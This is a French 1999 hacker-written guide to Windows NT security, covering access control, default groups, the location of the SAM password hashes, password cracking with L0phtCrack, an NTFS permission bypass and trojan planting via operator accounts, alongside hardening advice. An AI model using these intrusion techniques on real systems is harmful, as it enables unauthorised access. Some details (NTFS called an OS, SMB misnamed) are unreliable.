[ Ultime Guide de Hacking & Sécurité ]
Version 07/05/99 (b)
Shen-lun / shen_lun@hotmail.com
Cyberjunk / snipper@hotmail.com
Avril/Mai 1999
MHT Crew ~ phear.ctw.cc
Cryptel ~ cryptel.cjb.net
+--------------------------------+
| 1St PART: Mise dans le bain ;-)|
| Level: include |
+--------------------------------+
Disclaimer
Introduction Générale
Introduction à Windows NT
+--------------------------------+
| 2nd PART: Théorie HARD |
| Level: include |
+--------------------------------+
Les Shares (Notion de Partage)
Les vulnérabilités NTFS
Le Modèle de sécurité de Windows NT
SAM (Authentification des Users par le service SAM)
Groupes et Permissions
Groupes de Domaines par défaut
Groupes Locaux par défaut
Répertoires et Permissions par défaut
Administrateurs et Equivalents
Identité( ID, Sécurité et Administration )
Groupe des Administrateurs
Passwords (localisation et enregistrement)
Comment "Hacker" des Passwords
Brute force Attaque
Attaque par Dictionnaire
Utilisation de LophtCrack
LockOut Sécurité
Accompte Administrateur sans Password
Accompte Administrateur
Accompte Guest sans Password
TCP/IP et HTTP
Protocoles de Sécurité
Services SMB (Secure Message Block)
SAMBA
Utilisation de SAMBA vers NT
Vulnérabilités NT
Services d'Alerte NT
NetBIOS
Sécurité LAN Manager
NTNM (NT Network Monitor)
Service RSH
Service SCHEDULE
Registre NT
Système NT et Virus
Sécurité des Serveurs FTP
Utilitaire Rollback.exe
Securité du service RAS ( Remote Access Services)
Logs et Audits
+--------------------------------+
| 3rd PART: Travaux Pratiques |
| Level: include |
+--------------------------------+
Attaques possibles contre un serveur NT
Denial of Service
Vulnérabilité aux attaques TCP
Internet Information Services (IIS)
Active Server Pages (ASP)
Rappel sur NetBios / NetBeui via TCP/IP
Inter-Process Communication (IPC$)
Windows NT Security Identifiers (SID)
Attaque utilisant les SID2USER.EXE et USER2SID.EXE
Hack de NT en local
DLL Mapping exploit
Sniffer de réseaux
Utilisation de BUTTSniff.exe
+--------------------------------+
| 4th PART: Conclusion |
| Level: include |
+--------------------------------+
Conclusion
Sources
URL's
Remerciements
<------------------Conçu pour une résolution ---------------------------------------------------->
+--------------------------------+
| 1St PART: Mise dans le bain ;-)|
| Level: include |
+--------------------------------+
Disclaimer:
-=-=-=-=-=-=-
L'auteur n'assume de responsabilités, ni pour l'utilisation des
informations et programmes se trouvant cités dans ce document ,
ni pour leur utilisation, ni pour les contrefaçons de brevets ou
atteintes aux droits de tierces personnes qui pourraient résulter
de cette utilisation. Les exemples ou les programmes présentés dans
ce document sont fournis pour illustrer les descriptions théoriques.
Ils ne sont en aucun cas destinés à une utilisation commerciale
ou professionnelle.
Les auteurs ne pourront en aucun cas être tenu pour responsable des
préjudices ou dommages de quelque nature que ce soit pouvant résulter
de l'utilisation de ces exemples ou programmes.
Tous les noms de produits ou autres marques cités dans ce document
sont des marques déposées par leur propriétaire respectif.
Introduction Générale:
-=-=-=-=-=-=-=-=-=-=-=-
Parceque la popularité de Windows NT augmente de jour en jour, ainsi
que le nombre de serveur de ce genre sur internet j'ai décidé avec
l'aide de certaines personnes plus qualifiés que moi, et une bonne dose
de documentation sur NT d'écrire ce "guide".Le but de ce texte est laissé
à l'appréciation du lecteur (selon le coté auquel il appartient) pour
ma part je considére qu'il a un but strictement informatif, je n'ai
aucunement la prétention de dire que c'est une référence pour un
administrateur ou un pirate, malgrés tout ils pourront y trouver
des informations interressantes...
* vous étes le seul juge *
Je vous encourage donc à envoyer vos critiques et vos encouragements
(Faut pas réver mais bon ...) à shen_lun@hotmail.com.
Sur ces derniers mots, bonne lecture...
have fun!
Shen-Lun
Je dédicasse ce texte a tous ce ki veule s'instruire. Toutes remarques,
corrections, info supp (?) sont les bienvenue. Servez vous des mails ;-)
D'autre part il est basé sur le dicton :
* No pretention, just information *
So ... Let's Go now ?! =)
-junk-
Introduction à Windows NT:
-=-=-=--=-=-=-=-=-=-=-=-=-
Ce qu'il faut savoir à propos de NT:
* Windows NT utilise un modéle de securité basé objet ce qui signifie
que Windows NT vous permet de securiser chaque fichier stocké sur le serveur.
* Le modèle de sécurité de Windows NT se caractérise par quatre composés:
Le LSA (Local Security Authority),le SAM(Security Account Manager),
le SRM (Security Reference Monitor) et le UI (User Interface).
* Windows NT utilise le protocole SMB (Server Message Block) pour gérer
les transmissions.
* Windows NT possède un pointeur d'interface de sécurité qui lui permet
de supporter de nombreuses interfaces de sécurité.
* Un réseau sécurisé nécessite, en plus d'autres choses, un serveur sécurisé
"physiquement".
* Windows NT (New Technology ou Neanderthal Technology ?! =) est un serveur OS de
Microsoft.
Chez Microsoft on désigne Windows NT comme produit idéal en réponse à la demande
grandissante du marché des serveurs. Avec NT, Microsoft cible les réseaux sous
Windows 3.1, Windows 95, Windows 98 mais aussi NetWare et Unix.
* Windows 3.1 utilise comme base le MS-DOS FAT 16-bits (File Allocation Table),
Windows 9X utilise lui le syteme de FAT 32b-bits pour répertorier ou résident
les fichiers sur le disque dur, Windows NT répertorie les fichiers grace au NTFS
(NT file system).Le NTFS est lié a la sécurité NT c'est le noyau que NT utilise
pour controler les niveaux d'acces des informations sur le serveur.
NTFS et le modéle de sécurité de Windows NT permettent à l'administrateur du systéme
de gérer les accés aux ressources de façon trés stricte.
* Ce qui va suivre suppose que votre serveur Windows NT utilise NTFS comme OS de base.
Il est important si NTFS est l'OS de de votre serveur NT;si ce n' est pas le cas vous
devrez re-installer Windows NT avec NTFS comme OS. Pour déterminer quel OS utilise
votre serveur NT utilise, suivez les étapes suivantes:
1- Selectionnez le menu démarrer, programmes, option Windows NT Explorer du serveur.
Windows NT vas lancer L'Eplorer de Windows NT.
2- Un click sur le bouton droit de la souris sur le disque dur de boot
(c'est à dire le disque dur sur lequel NT démarre) dans l'Explorer NT afficheras
un menu).
3- Selectionner les propriétés sur le menu.Cela afficheras la boite de
dialogue des propriétés.
4- L'OS est indiqué dans a la section File system, si ce n'est pas NTFS
(c a d MS-DOS ou OS/2) vous devez re-installer votre serveur Windows NT.
rem: Juste pour information, NTFS n'est pas totalement une inovation car
il s'agit en fait du HPFS (OS/2) à la sauce kro$oft.
+--------------------------------+
| 2nd PART: Théorie HARD |
| Level: include |
+--------------------------------+
Les Shares (ressources partagées):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Les "Shares" sous Windows NT sont les fichiers ou repertoires qui sont
en accés partagés sur le serveur.Lorsque vous installez Windows NT cela
crée certains partages par défaut sur le serveur, la plupart sont invisbles
pour tous les utilisateurs sauf pour celles gérant l'administration.
Les partages d'administration sont des accomptes permanent par défaut qui
ont un $ à la fin de leur nom. WINNT$ est le repertoire root du système de
fichiers.
Les Vulnérabilités de NTFS:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
En fait NTFS n'as pas réellement de vulnérabilité par lui même mais il
posséde une petite faiblesse que les hackers peuvent exploiter à différents
degrés.Il ya trois légeres insuffisances dans NTFS:
1- Si vous créez un repertoire pour un user, cet user a la possibilité de
controler les permissions d'accés à ce répertoire ou fichier. Par exemple,
si vous créez un répertoire pour l'user Newbie, l'user Newbie peut utiliser
les outils d'administration système pour permettre l'accés à ce répertoire
à tous ceux qui ont accés au serveur, car Newbie est le propriétaire de ce
répertoire.Ce n'est pas particulierement dangereux en soi-même, mais si un
hacker s'introduisant dans le serveur se loggue avec cet user qui à des droits
d'accés étendus, l'intruder peut partager les répertoires de cet user avec tout
le monde "everyone" (laissant ainsi un seul enregistrement de vérification),
ensuite il se déloggue du serveur et se reloggue dans son accompte, mais il
garde l'accés à son nouveau répertoire partagé.
2- Si un hacker posséde un accés physique au serveur NT, il peut rebooter le
serveur avec une disquette MS-DOS et utiliser un utilitaire appellé ntfsdos.exe
pour accéder au disque dur du serveur.Le hacker peut ensuite avoir accés au disque
dur entier sans se soucier des permissions de sécurité. Il en va de même pour un
système en multiboot, NT avec Linux par exemple.
3- Si vous donnez à un user le controle total de son répertoire au lieu de
read, write, delete et create permissions, l'user reçoit une permission cachée
nommée File Delete Child.Si vous accordez a l'user le controle total, vous ne
pourrez plus enlever cette permission cachée.La permission File Delete Child permet
à n'importe quel user d'éffacer n'importe quel fichier en lecture seule du répertoire.
Selon ce que contient le répertoire, l'user peut éffacer des fichiers importants ce
qui peut étre trés dangereux pour votre installation de NT.
Le Modèle de sécurité de Windows NT:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Avant de travailler avec Windows NT, même si l'on en connait les bases, il est
préférable d'avoir compris les bases du modèle de sécurité de Windows NT.
Cette section décrit les bases et introduit des termes nécessaires à la compréhension
de la suite du texte.
Lorsque Micrososft a décidé de créer un seveur OS , ils avaient en téte que leur
système atteigne au minimum la classe C2 (décrite dans le "Department of Defense
's Orange Book System"). Une classe de sécurité C2 se caractérise par différent
facteurs à dans le modéle de sécurité de l'OS.
Bien que le serveur Windows NT ai reçu la certification C2 (pour sa version 3.51),
c'est seulement une certification pour une machine seule, sans lecteur de disquette
et sans connections à un réseau. Néanmoins, Microsoft a dévellopé un modèle de sécurité
pour Windows NT qui, par le fait de sa nature extensible, assure un environement pour
un serveur commercial assez sécurisé. En effet le modéle de sécurité de Windows NT est
extensible, ce qui signifie que des programmes peuvent facilement étendre les capacités
du modèle en incluant de nouvelles fonctions de sécurité.
Cela se caractérise par des améliorations du systéme de sécurité a travers les
versions de Windows NT:
Le modèle de sécurité de NT 4.0 n'intègre pas de support Kerebos,à la différence du
modéle NT5.
Chaque objet de Windows NT posséde ses propres attributs de sécurité qui gérent l'accés
d'un user à cet objet. Ces attributs sont appelés security descriptor,qui ont deux
composants:
* Une liste de controle des accés (Access-Control List) et des informations sur
l'objet lui même.
* L'Access-Control List (ACL)contient des informationsqui spécifient quels users et
quels groupes ont accés a l'objet, et quel niveau d'accés ont ces users et ces groupes.
Ces groupes sont des users associés par fonction ou groupes sociaux, ou selon le
département technique auxquels ils appartiennent (Ex: MANAGERS, PUB, etc).
Windows NTinstalle de nombreux goupes par défaut: Everyone, Power, Users et Administrators.
Il est important de noter que Windows NT supporte des niveaux d'accés ou types pour
chaque groupes.Par exemple le groupe Everyone pourrait avoir un accés en lecture seule
pour un objet, et les groupes Power et Users pourraient avoir les accés en lecture,
écriture, copie, suppréssion pour un objet.L'OS permet un controle spécifique sur qui
peux accéder a quel objet et comment une personne peut acceder a cet objet.
Windows NT divise l'ACL en deux composants, le Discretionary ACL et le System ACL,
qui décrivent deux différent type de restriction pour chaque objet.Le DACL controle
quels users ont accés a un objet, alors que le SACL controle quels objets systéme
et quels services ont accés à un objet.Le DACL est la liste que vous modifierez le
plus souvent (avec les accés) car l'OS maintient toutes les informations dans le SACL.
Le DACL quand a lui contient une entrée pour chaque user ou groupe enregistré dans
le systéme.L'OS reconnait ces entrées dans le DACL comme Access-Control Entries (ACE).
L'ACE contient la notation actuelle sur les niveaux d'accés d'un user ou groupe pour
un objet.
Lorsque un user ou un service de Windows NT crée un objet, l'OS Windows NT crée
toujours le security descriptor pour l'objet.Si l'user ou le service ne lie pas
ses propres attributs de sécurité a ce fichier,Windows NT crée le DACL dans le
security descriptor sans ACE.En fait Windows NT n'assigne aucune permission spécifique
a cet objet.
Comme le requiert la classe de sécurité C2, l'OS Windows NT est construit de façon a
ce que " ce qui n'est pas explicitement permis, est interdit".Aussi, parceque Windows
NT crée l'objet sans permissions explicite, personne ne peut avoir accés a l'objet.
Malgrés ça aprés l'ajout de permissions spécifiques par le systéme à cet objet, seul
les users ou groupes nommés dans le DACL auront la permission d'accés à l'objet.
Composants du modéle de sécurité de Windows NT :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Local Security Authority (LSA)
Le LSA est aussi connu sous le nom de Security Subsystem.
C'est le composant principal de la sécurité NT.Il gére la sécurité locale et
l'authentification des users . Le LSA gére aussi la génération et le log des messages
de vérification.
* Sécurity Account Manager (SAM)
Le SAM gére les accomptes des users et des groupes,et les services d'authentification
des users pour le LSA.
* Security Reference Monitor (SRM)
Le SRM assure la validité et la vérification des accés pour le LSA.Il controle les
accomptes des users et les essais des users pour acceder a divers fichiers ou repertoires
et ainsi permet ou non a l'user d'acceder au fichier.Le SRM génére des messages de
vérification en fonction de la permission accordée ou non.Le SRM contient une copie du
code de validation des accés pour assurer que le SRM protége les ressources uniformément
dans tout le systéme,sans ce soucier du type de ressource.
* User Interface (UI)
Une partie importante du modéle de sécurité, l'UI est ce que l'user utilise couramment
pour les taches administratives.
En clair, le LSA gére la pluspart des taches de management du systéme de sécurité.
Le LSA appelle le SAM et le SRM quand il a besoin de leurs services et ensuite renvoie
les résultats a l'administrateur ou l'user a travers l'interface UI.
Interéactions entre les quatres composants du modéle de sécurité:
La structure essentielle des permissions NT signifie que pour chaque objet sur le
réseaux NT, chaque user ou groupe doit avoir une permission spécifique pour avoir
accés a l'objet avant que l'OS laisse l'user ou le groupe accéder a l'objet.
SAM (Authentification des Users par le service SAM)
Le SAM génére les services d'authentification des users pour le LSA.Lorsque l'on veux
sécuriser un réseaux NT il est important de comprendre comment le SAM authentifie les users.
D'abord le user essaiye de se logguer sur le systéme.Si Windows NT reconnait le
login et le password de l'accompte de l'user, NT permet alors a l'user de se logguer
sur le systéme et NT crée alors un objet virtuel (Token /Jeton) qui représente
l'user sur l'OS.
L'OS associeras chaque processus que lance l'user avec le Token (ou une copie du Token)
que l'OS crée lorsque l'user se loggue sur le réseaux.Windows NT fait réference a
la combinaison token-processus comme un sujet.Par exemple, lorsqu'un user lance
un programme, l'OS crée un sujet qui contient le processus du programme ( thread )
et le token de l'user.
NT vérifie le token du sujet avec l'ACL de l'objet et détermine si oui ou non il
doit laisser le sujet accéder a l'objet.En fonction de la configuration de votre
serveur, chaque accés, qu'il soit accepté ou refusé, génére un message de vérification.
L'OS lit le sujet du token avant de donner l'acces a l'objet.
Groupes et Permissions:
-=-=-=-=-=-=-=-=-=-=-=-
Windows NT base son modéle de sécurité autour des users, groupes et permissions
de sécurité accordées à ces users et goupes.Vous pourrez créer des users et groupes
à l'aide du programme User Manager for Domains ( usrmgr.exe sous Workstations et
musrmgr.exe sous NT server ).
Groupes de Domaines par défaut:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Lorsque vouz installez le serveur Windows NT, l'OS crée automatiquement six groupes
par défaut:Administrator, Backup Operators, Guests, Power Users,
Replicators, et Users.
Les six groupes correspondent aux droits d'accés de base que vous devrez utiliser
dans votre réseaux NT.Le groupe Administrator a un accés total a chaque repertoire
et fichier a travers le systéme de fichier du domaine.Les users administrateurs
(s'occupant aussi de la gestion du systéme et nécessitant des droits d'accés étendus)
ayant besoin des droits Administrator doivent avoir les droits Administrator
et Power Users.
Groupes de domaines sur un serveur NT:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>Administrators: Les Administrateurs ont un droit d'accés total sur chaque
fichier et repertoiresur le serveur dans le domaine.
>Backup Operators: Les Backup Operators peuvent outrepasser les controles
des fichiers de sécurité comme la plupart des opérations de sauvegarde.
Ces droits peuvent poser des problémes de sécurité car un hacker peut faire
un back-up du réseau et accéder aux fichiers une fois off line.
>Guests: Les accomptes Guest sous Windows NT peuvent se logguer dans le domaine
et voir la plupart des fichier a l'interieur du domaine mais ne peuvent pas
ouvrir ou accéder a ces fichiers.
>Power Users: Les Power Users ont tous les droits des users.En plus ils peuvent
partager des répertoires et imprimantes avec d'autres Power Users et possédent
des droits étendus pour les bases de donnée.
>Replicators: Les users du groupe Replicators peuvent copier des fichiers dans
un domaine, d'un endroit à un autre, mais ne peuvent pas ouvrir ou modifier ces
fichiers copiés sans des droits d'accés supplémentaires.
>Users: Les Users ont généralement accés a leur repertoire home, aux applications,
et aux fichiers partagés pour lesquels ils ont les bons droits.
Groupes Locaux par défaut:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Windows NT crée par défaut un certain nombre de groupes locaux qui peuvent avoir
plusieurs fonctions.
>Server Operators: Les utilisateurs membres du groupe Server Operators peuvent
rebooter le serveur, même a distance, ils peuvent remettre a zero le system time
du serveur, et faire des sauvegardes et des restaurations.
>Backup Operators: Les utilisateurs membres du groupe Backup Operators peuvent
rebooter le serveur, faire des sauvegardes et restaurations.
>Account Operators: Les utilisateurs membres du groupe Account Operators peuvent
rebooter le serveur.
>Print Operators: Les utilisateurs membres du groupe Print Operators peuvent
rebooter le serveur.
Aussi, les membres de ces groupes peuvent se logguer sur la console.Vous devez
securiser et régir les priviléges d'accés des accomptes locaux cités ci-dessus,car si
un hacker obtient un accompte de Server Operator, il peut placer un trojan (comme netbus
ou back orifice...) sur le serveur et ensuite rebooter la machine a distance, pour pouvoir
utiliser ensuite le trojan pour obtenir des priviléges d'administrateurs.
Répertoires et Permissions par défaut:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Lorsque vous installez Windows NT, il crée certaines permissions de répertoires par
défaut pour chaque groupe crée par défaut.Les Administrateurs ont accés a tous les fichiers
dans le serveur ou domaine, les autres groupes ont les permissions par défaut suivantes:
>winnt, \system32, \win32app: Server Operators et Users peuvent lire et exécuter des
fichiers, afficher les permissions sur les fichiers et changer quelques attributs de fichier.
>\system32\config: Tous les Users peuvent lister les noms des fichiers dans ce répertoire.
>\system32\drivers, \system\repl: Server Operators ont tous les droits (lire, executer,
ecrire, supprimer et créer) les Users ont un accés en lecture seule.
>\system32\spool: Server Operators et Print Operators ont tous les droits.Tous les Users
ont un accés en lecture seule.
>\system32\repl\export: Server Operator peuvent lire et exécuter les fichiers, afficher
les permissions sur les fichiers, et changer quelques attributs de fichier. Replicator ont
un accés en lecture seule.
>\system32\repl\import: Server Operators et Replicator peuvent lire et exécuter des fichiers,
afficher les permissions sur les fichiers, et changer quelques attributs de fichier.
Users ont un accés en lecture seule.
>\users: Account Operators peuvent lire, écrire, supprimer, et exécuter des fichiers.
Users peuvent lister les noms des fichiers de ce répertoire.
>\users\default: Tous les Users peuvent lire , écrire, et exécuter les fichiers.
Lorsque vous créez des permissions pour les groupes dans votre installation, vous
devez modifier les accés des groupes aux répertoires ci dessus.
Administrateurs et Equivalents:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Les utilisateurs dans le groupe Administrators ont accés a toutes les ressources
sur le systeme même si ils n'ont pas de permissions d'accés spécifiques pour un
répertoire spécifique.Ensuite , vous devez restrindre le niveau d'accés Administrators
aux utilisateurs appropriés et laisser ce niveau d'accés fermé pour les utilisateurs
non authorisés.La structure des permissions de fichiers de Windows NT vous permet
d'utiliser le Windows NT Audit Tool pour gérer l'utilisation du niveau d'ID Administrator.
Vous pouvez aussi assigner une seconde ID user avec une appartenace au groupe
Administrators, pour les utilisateurs qui doivent avoir un niveau d'accés élevé.
En créant une seconde ID user vous pourrez surveiller les accés et les logins que
les users utilisent avec le niveau d'ID Administrator.
Identité( ID, Sécurité et Administration ):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Il arrive de vouloir créer des users spéciaux , qui peuvent avoir des droits d'accés
d'users sans avoir accés au réseaux complet.Au lieu d'assigner une ID Administrator
vous pouvez assigner un groupe Account Operators.L'administarteur peut ainsi s'assurer
que l' Account Operators a tous les dtoits dans la partie du reseaux le concernant.
Si vous créez différent Account Operators dans chaque département cela réduira le travail
d'administration du réseaux.De plus chaque Account Operator est responsable de tous les
accés dans son dépatement d'Account Operator.Cela permet de mieux repérer lorsque des
accés sont donnés a des mauvais fichiers ou repertoires, et quel est l'Acount Operator
responsable.
Groupe des Administrateurs:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
C'est parce que les users avec les priviléges du groupe Administrators ont accés au
serveur entier que un hacker essayera d'abord d'avoir accés au serveur par un accompte
avec des priviléges d'administrateur.Si ces accomptes là sont suffisament sécurisés ,
alors les hackers essayent de pénétrer le systéme avec un accompte de plus bas niveau
et obtient par lui même des droits dans le groupe d'Administrateurs.c est ce que l'on
appelle une "Security step-up attack".
Le meilleur moyen de se défendre contre une attaque de ce genre est d'éliminer ou de
changer les doits du groupe Administratorsdans l'installation de Windows NT .Si vous
créez un nouveau groupe (ex: LAN-Admins) et que vous assignez tous les droits a ce
groupe, et eliminez ou reduisez les droits d'accés du groupe Administrators vous pourez
empecher une attaque de ce genre simplement parceque le hacker ne pourra pas identifier
a quel groupe il doit s'attaquer pour obtenir ces droits.
Passwords (localisation et enregistrement):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Chaque OS posséde une base de données des mots de passe, qu'il utilise pour vérifier
l'authentification du login de l'user.La base de donnée des mots de passes de Windows
NT est localisé dans le repertoire \winnt\system32\config\sam du serveur. La base de
donnée des passwords n'est ni enregistrée sous forme de passwords, ni sous forme de
passwords encryptés. Windows NT enregistre la base de donnée des passwords sous forme
d'une valeur minimisée "hash" pour chaque password. Cette fonction réduit le password
a une unique valeur. Dans Windows NT, l'OS converti le texte du password de l'user en
un Unicode (série de bytes) et ensuite utilise l'algorythme MD4 (Message Digest-4) pour
convertir les passwords en une valeur "hash":
+------------------+
User: Jame | |
Password: Bond ----->| HASH |----> 2451938
| |
+------------------+
Lorsqu'un user essaye de se loguer sur le serveur, la Workstation Windows NT reproduit
le même processus que l'OS lorsqu'elle enregistre les passwords dans sa base de donnée,
la Workstation converti le password par le MD4 pour obtenir la valeur "hash".Ensuite la
Workstation envoie cette valeur "hash" au serveur, qui compare cette valeur avec la valeur
enregistrée dans la base de donnée des passwords du serveur.Si les deux valeurs correspondent
le serveur logue l'user sur le sytème.
La façon dont Windows NT gére les passwords évite que la base de donnée sur le serveur ne
soit pas seulement du texte encrypté comme sur les serveurs Unix dans le /etc/password
(encryption DES).
Comment "Hacker" des Passwords:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Pour (re)trouver les passwords de votre réseau Windows NT , un hacker doit avoir accés
a un login et a l'implémentation NT MD4. Aprés que le hacker ai copié la base de donnée
des passwords (seul endroit ou trouver des logins et les MD4 hash), l'intruder pourras
alors tenter un brute force ou une attaque au dictionnaire contre le fichier password.
Brute force Attaque:
-=-=-=-=-=-=-=-=-=-=-
Lorsqu'un hacker attaque une installation sous Windows NT sa premiere démarche est
généralement d'essayer de gagner un accés par un accompte avec un password de faible
niveau. Si vous n'avez pas lancé le "Lockout Account", le hacker peut essayer des passwords
jusqu'a ce que le réseaux les accéptent.Un hacker peut automatiser ce processus a l'aide
d'un programme,cette technique est connue sous le nom de "Brute force passsword-cracking
technique".Un programme qui réalise une brute force attaque essaye des passwords comme
aa, ab ,ac ...et jusqu'a ce qu'il trouve une combinaison de caractéres acceptée.
Une brute force attaque contre un serveur NT veut dire que le hacker a accés a une console,
ou a une copie de la base de donnée des passwords.Dans le cas ou le hacker lance une brute
force attaque contre une base de donnée des passwords de NT, de nombreux logiciels
(passwords-cracker), peuvent casser un password de 16 caractéres en une semaine.
La meilleure défense contre une brute force attaque est de sécuriser le serveur de telle
façon a ce que la base de donnée des passwords ne soit pas accéssible aux personnes
exterieures.
Attaque par Dictionnaire:
-=-=-=-=-=-=-=-=-=-=-=-=-
Les attaques au dictionnaire fonctionnent de deux façons différentes: contre la base de
donnée des passwords (off-line) et contre le serveur au prompt du login (si vous n'avez
pas lancé le Lockout Account).Son fonctionnement est simple, une liste de mots est encryptée
par le même algorythme qu'utilise Windows NT pour comparer cette encryption avec la valeur
"hash" (si le hacker a une copie off-line de la base de donnée des passwords ).
La meilleure protection contre une attaque au dictionnaire est de forcer les users a
changer leur mots de passe et d'utiliser des programmes de passwords checking qui testent
la faiblesse des mots de passe, sensibiliser les users pour qu'ils utilisent des passwords
plus fiables (huit lettres minimum, de préférence avec des chiffres,des lettres et des
symboles ).
Utilisation de LophtCrack:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Ce cracker, fait parti des meilleurs reservé à Windows NT. Il fonctionne sous Windows NT,
et vous propose toutes les fonctions courantes des crackers, dicos, brute force,Pause/Restore.
Par contre son utlisation est limité à 15 Jours. Les derniéres versions contiennent un
Dumper et un sniffer. Pour le downloader, www.l0pht.com .
Un "plug-in" est disponible pour aller un peu plus vite que la version basique, appellé
smbgrinder.
LockOut Sécurité:
-=-=-=-=-=-=-=-=-
Si vous n'activez pas le LockOut Account, par défaut il n'y aura pas de blocage du systeme
de log-in au bout d'un certain nombre d'essais, ce qui permet a un hacker de faire des brutes
forces attaques sur n'importe quel accompte sans restrictions.
Vous devez donc pour eviter cela activer le "LockOut Account" qui bloque le systéme
au bout d'un nombre limité de tentatives, Microsoft recommande d'activer le Lockout
Account aprés cinq essais incorrects.
Accompte Administrateur sans Password:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
L'accompte Administrator est le plus privilégié des accomptes NT, Un accompte Administrator
sans password pose un risque majeur pour la sécurité de votre réseaux.Certains serveurs
pré-installés, n'ont pas de passwords sur l'accompte administrateur, modifiez cette
omission au plus vite.
Accompte Administrateur:
-=-=-=-=-=-=-=-=-=-=-=-=-
Par défaut, Windows NT ne peut activer le "LockOut Account" pour l'Administrateur.
C'est ce qui fait que l'accompte Administrator est plus vulnérable a une attaque au
dictionnaire on line.Pour corriger la vulnérabilité de l'accompte Administrateur, il
y a trois étapes à suivre:
1- Renomer l'accompte Administrator en autre chose que le hacker ne pourrais deviner
aisément.
2- Ajouter un nouvel User nommé "Administrator" au goupe "Guest" en plus de renommer
accompte Administrator.Donner au nouvel user "Administrator" un password trés long qu'il
sera difficile au hacker de trouver.Ensuite désactivez le LockOut Account pour cet user,
et monitorez tous les essais de login sur cet accompte.
3- Effacez les droits de l'accompte "Administrator" pour se loguer au réseau, en d'autres
mots, forcez l'"Administrator" à se loguer sur le réseau par la console.Si vous faites
cela vous forcez alors une brute force attaque a venir de la console, de plus seuls
les users avec un LockOut Account automatique peuvent se loguer a partir du réseau sur
la console.
Accompte Guest sans Password:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bien que Windows NT 4.0 ai l'accompte "Guest" non activé par défaut,les versions 3.5 et
3.51 incluent un accompte "Guest" global.Si vous n'avez pas désactivé cet accompte
"Guest" et qu'il n'ai pas de passwords, un hacker peut peut se loguer dans le serveur
avec n'importe quel login et password.Si vous n'avez pas restreind l'accés a certains
fichiers ainsi qu'aux registres NT, l'intru peut alors acceder à des zones sensibles.
En clair, la meilleure solution a ce probléme est de désactiver l'accompte "Guest".
TCP/IP et HTTP:
-=-=-=-=-=-=-=-
Les machines NT (surtout les gateways ) ne supportent habituellement pas les commandes
de systémes Unix comme NFS (Network File System), NIS (Network Information System),
Sun RPC,et les commandes r d'Unix (rlogin...), il est plus facile de boucher des
trous dans les défenses TCP/IP de Windows NT que dans un environnement Unix.
Deplus les users distants (remote) auront accés au serveur NT par le RAS
(Remote Access Service), plutot que par Telnet, ce qui vous permet un plus grand controle
sur les remotes users.Le RAS fournit des services de sécurité pour se protéger contre des
options de la ligne de commande des remotes users.
Le risque le plus grand d'attaques contre un serveur NT venant de l'internet sont les attaques
par le SMTP (Simple Mail Transport Protocol) et par les services HTTP (HyperText Transport
Protocol).Lorsque votre systéme boote, assurez vouz que vos services SMTP et HTTP aient des
permissions d'accés limités (au niveau users) qui limitent l'accés aux objets ou
repertoiresauxquel le service a besoin d'accéder.Par exemple,votre service HTTP devrais
avoir un accés en lecture seule sur repertoire qui contient vos fichiers internet, a moins
qu'un Script CGI génere une page spécifique une fois lancé, dans ce cas, le service devrais
avoir un accés en lecture-écriture sur cette page web seulement.en aucun cas, vos services
SMTP et HTTP ne doivent avoir des accés complets sur le disque dur du serveur.
HTTp est un protocole relativement simple, limité a un petit nombre de commandes établies.
Malheureusement (ou heureusement pour d'autres =] !! )dans son implémentation initiale le
service du serveur web NT (Internet-Information Server, ou IIS), qui lance HTTP sur l'OS
Windows NT, a quelques trous de sécurités majeursqui permettent a un hacker d'utiliser des
commandes pour pénétrer le systéme.par exemple, un des trous de sécurité permet a n'importe
qui avec un accés distant (remote access) a un IIS Web-Server (c'est à dire n'importe
qui sur internet, si le serveur est connecté à internet) d'effacer des fichiers pour lesquels
le serveur a des permissions de suppréssion, sans loguer les accés (a moins que
l'administrateur active le "base-object Auditing").
Pour corriger le probléme dans l'IIS, assurez vous que vous ayez installer la version
la plus récente d'IIS sur votre serveur Web NT.
Protocoles de Sécurité:
-=-=-=-=-=-=-=-=-=-=-=-
Les différents protocoles de sécurité peuvent utiliser différentes APIs (Application
Programming Interfaces), qui peuvent créer des problémes pour les applications qui
devraient utiliser plus d'une API.La solution de Microsoftace probleme de sécurité de
protocoles, pour Windows 9x et Windows NT est le SSPI (Security Service Provider Interface).
Le SSPI n'est pas une version complétement compatible du IETF (Internet Engineering Task
Force), standard du service de sécurité de l'API (Generic Standard Security API). Comme
celui ci le SSPI procure une façon d'accéder aux services de sécurité distribués pour quel
que soit ce service.Le SSPI est fonctionnel sous Windows NT, alors que le IETF fonctionne
sous d'autres OS.
Les SSP (Security Service Providers) sont des composants, qui viennent implémenter le
le SSPI dans Windows NT 4.0, Microsoft a inclu ces SSP pour le NT LAN Manager et
SSL/Private Communications Technologies.Microsoft a commencéa inclure un SSP de
Kerebos et une version updatée du provider de SSL/Private Communication Technology dans
Windows NT 5.0 .
Les protocoles communiquent avec les SSP,qui communiquent avec la SSPI,qui ensuite
communique avec les APIs sous jacentes pour implementer la requette du protocole.
HTTP, le protocole CIFS (Common Internet Files System) que le DFS ( Distributed File
System) utilise, et le protocole Microsoft Remote Procedure Call (RPC for Windows),utilisent
tous le SSPI pour communiquer avec Windows NT.Chacun de ces protocoles peuvent utiliser
n'importe quel SSP, laissant à chacun le soin de faire le choix approprié.En clair , en
séparant les services de sécurité distribués de leur providers,l'architecture des providers
de sécurité de Microsoft supporte de nombreuses options sans créer trop de complexité.
Services SMB (Secure Message Block):
